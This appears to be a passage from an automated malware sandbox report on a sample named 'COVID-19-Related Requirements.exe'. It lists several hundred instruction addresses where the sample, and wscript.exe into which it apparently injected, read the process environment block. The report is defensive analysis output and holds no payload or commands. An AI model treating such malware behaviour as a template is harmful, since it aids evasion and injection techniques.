          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E78F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DBEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DBFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DCF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DDE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DDF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DDA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DCC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DAC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DC4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DD2AE4 mov eax, dword ptr fs:[00000030h]
